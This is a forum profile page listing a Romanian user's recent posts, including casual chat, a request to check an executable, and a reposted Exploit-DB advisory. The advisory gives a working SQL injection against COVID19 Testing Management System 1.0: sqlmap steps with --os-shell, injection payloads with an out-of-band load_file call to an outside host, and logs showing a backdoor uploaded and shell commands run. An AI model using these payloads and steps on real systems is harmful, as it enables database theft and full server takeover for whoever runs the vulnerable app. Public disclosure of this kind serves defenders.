Jump to content

GabrielRo

Members
  • Posts

    23
  • Joined

  • Last visited

  • Days Won

    2

GabrielRo last won the day on December 15 2021

GabrielRo had the most liked content!

Reputation

17 Good

About GabrielRo

  • Rank
    Enthusiast
    Enthusiast

Profile Information

  • Gender
    Male

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Va salut, imi puteti spune va rog daca este clean acest exe, si nu are nimic ascuns in acel exe.. Va multumesc! https://www.virustotal.com/gui/file/b9a187b59c758ead0022e50bbaae4133d2e37b769a054249afc0b6aa2e26774d https://www.hybrid-analysis.com/sample/b9a187b59c758ead0022e50bbaae4133d2e37b769a054249afc0b6aa2e26774d
  2. Asa este, totul ce se găsește aici public, găsești și acolo.. surse bubuite de Botnet IRC Rxbot, de la programe scrise în Visual Basic Dos Attack.
  3. Sunt vaccinat, si ma voi mai vaccina daca trebuie. Si nu bag in seama ce zice șoșoacă.
  4. https://pasteboard.co/MTYkd9IZ1lxD.jpg 🌡😂
  5. Nu l-am instalat inca, urmeaza sa il instalez.
  6. https://www.digi24.ro/stiri/sci-tech/whatsapp-facebook-si-instagram-au-picat-la-nivel-mondial-1689813 🤔🙄
  7. Vulnerable App: # Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection # Google Dork: intitle: "COVID19 Testing Management System" # Date: 09/08/2021 # Exploit Author: Ashish Upsham # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ # Version: v1.0 # Tested on: Windows Description: The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to SQL injection via the 'searchdata' parameter on the patient-search-report.php page. ==================== 1. SQLi ==================== http://192.168.0.107:80/covid-tms/patient-search-report.php The "searchdata" parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated user has the full ability to run system commands via --os-shell and fully compromise the system POST parameter 'searchdata' is vulnerable. step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool. step 2 : Now copy the post request and save it as test.txt file. step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell" ---------------------------------------------------------------------- Parameter: searchdata (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search [19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method [19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B) [19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php [19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php[19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] y command standard output: 'laptop-ashish\ashish' os-shell> Sursa: https://www.exploit-db.com/exploits/50190
×
×
  • Create New...